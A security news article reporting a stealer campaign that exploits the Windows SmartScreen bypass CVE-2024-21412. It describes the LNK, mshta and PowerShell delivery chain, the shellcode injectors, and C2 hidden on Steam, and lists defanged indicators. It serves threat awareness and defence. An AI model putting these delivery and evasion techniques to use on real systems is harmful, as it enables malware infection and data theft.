Hackers Exploit Windows SmartScreen Vulnerability Hydra, Lumma, & Meduza Stealers

A critical security bypass vulnerability, tracked as CVE-2024-21412, has been identified in Microsoft Windows SmartScreen.

This flaw arises from an error in handling maliciously crafted files, allowing remote attackers to bypass SmartScreen security warnings and deliver malicious payloads.

Over the past year, cybercriminals, including Water Hydra, Lumma Stealer, and Meduza Stealer, have exploited this vulnerability to conduct widespread attacks.

Exploitation Details

FortiGuard Labs has observed a stealer campaign leveraging CVE-2024-21412 to download malicious executable files. Attackers lure victims into clicking crafted links to URL files, which subsequently download LNK files. These LNK files then fetch executable files containing HTA scripts.

Once executed, these scripts decrypt PowerShell code to retrieve final URLs, decoy PDF files, and a malicious shell code injector. The injected stealer then initiates malicious activities and sends the stolen data to a Command and Control (C2) server.

Telemetry highlighting the United States, Spain, and ThailandAttack Chain Diagram
Telemetry highlighting the United States, Spain, and ThailandAttack Chain Diagram
Attack chain diagram
Attack chain diagram

Initial Access

The attack begins with a malicious link to a remote server, searching for a URL file with specific content.

Constructing malicious link to a remote server to search for a URL file
Constructing malicious link to a remote server to search for a URL file

 The target LNK file employs the “forfiles” command to invoke PowerShell, then executes “mshta” to fetch an execution file from the remote server “hxxps://21centuryart.com.”

Join our free webinar to learn about combating slow DDoS attacks, a major threat today.

HTA Script Execution

Several LNK files were collected during the investigation, all downloading similar executables containing an HTA script embedded within the overlay.

This HTA script has set WINDOWSTATE=”minimize” and SHOWTASKBAR=”no,” playing a crucial role in the infection chain by executing additional malicious code.

Decoded and decrypted script
Decoded and decrypted script

After decoding and decrypting the script, PowerShell code downloads two files to the “%AppData%” folder: a decoy PDF and an execution file that injects shell code for the next stage.

Shell Code Injector

Two types of injectors were identified in this attack chain. The first variant leverages an image file to obtain shell code, with low detection rates on VirusTotal.

The injector downloads a JPG file from the Imghippo website, decodes the bytes to get the shell code, and calls the entry point of the shell code.

The shell code then obtains all the APIs from a CRC32 hash, creates a folder, and drops files in “%TEMP%,” identified as HijackLoader.

Dropping files in the temp folder
Dropping files in the temp folder

The second injector decrypts its code from the data section and uses a series of Windows API functions to perform shell code injection.

Assembly code for calling shell code
Assembly code for calling shell code

Final Stealers

This attack employs Meduza Stealer version 2.9, with its panel found at “hxxp://5[.]42[.]107[.]78/auth/login.”Meduza Stealer Panel

Meduza Stealer's panel
Meduza Stealer’s panel

An ACR stealer loaded from HijackLoader was also identified. It hides its C2 on the Steam community website with a dead drop resolver (DDR) technique.

Base64 encoded C2 on Steam
Base64 encoded C2 on Steam

Other ACR Stealer’s C2 servers were found on Steam by searching for the string “t6t.” After retrieving the C2 hostname, the ACR stealer constructs a complete URL to fetch the encoded configuration from the remote server, which contains crucial information for the stealer.

Decoded Configuration
Decoded Configuration

Water Hydra, Lumma Stealer, and Meduza Stealer exploited CVE-2024-21412, which highlights the critical need for robust cybersecurity measures.

Users are advised to update their systems promptly and remain vigilant against suspicious links and files to mitigate the risk of such attacks. Businesses can teach their customers not to open files from unknown sources to lessen the impact of these kinds of attacks.

Protecting against advanced attack vectors requires a strong and proactive cybersecurity strategy since threat actors are always inventing new methods. Protecting a company’s digital assets requires proactive steps, user education, and strict security rules.

Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo

Dhivya
Divya is a Senior Journalist at Cyber Security news covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.